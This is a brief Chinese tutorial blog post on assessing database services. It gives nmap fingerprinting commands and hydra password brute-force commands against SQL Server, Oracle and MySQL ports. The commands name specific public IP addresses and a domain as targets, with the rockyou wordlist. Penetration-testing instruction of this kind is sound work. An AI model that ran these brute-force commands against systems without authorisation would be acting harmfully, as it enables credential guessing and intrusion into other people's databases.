专业编程教程与实战项目分享平台

网站首页 > 技术文章 正文

第9章 数据库服务评估(网络安全评估)

ins518 2024-11-16 21:55:30 技术文章 5 ℃ 0 评论

如果数据库端口对我们开放,先进行指纹识别,如果版本比较低有漏洞,那么就走漏洞利用,如果没有漏洞,那么就走暴力破解

1、sql server 指纹识别

nmap -Pn -sV 47.98.47.58 -p  1433

2、sql server 暴力破解

hydra -l admin -P /usr/share/wordlists/rockyou.txt mssql://47.98.47.58

3、oracle 指纹识别

nmap -Pn -sV 120.24.5.197 -p 1521

4、oracle 暴力破解

hydra -P /usr/share/wordlists/rockyou.txt oracle-listener://120.24.5.197

5、mysql 指纹识别

nmap -Pn -sV webmail.rusc60.club -p 3306

6、mysql 暴力破解

hydra -l admin -P /usr/share/wordlists/rockyou.txt mysql://webmail.rusc60.club -t 1

Tags:

本文暂时没有评论,来添加一个吧(●'◡'●)

欢迎 发表评论:

最近发表
标签列表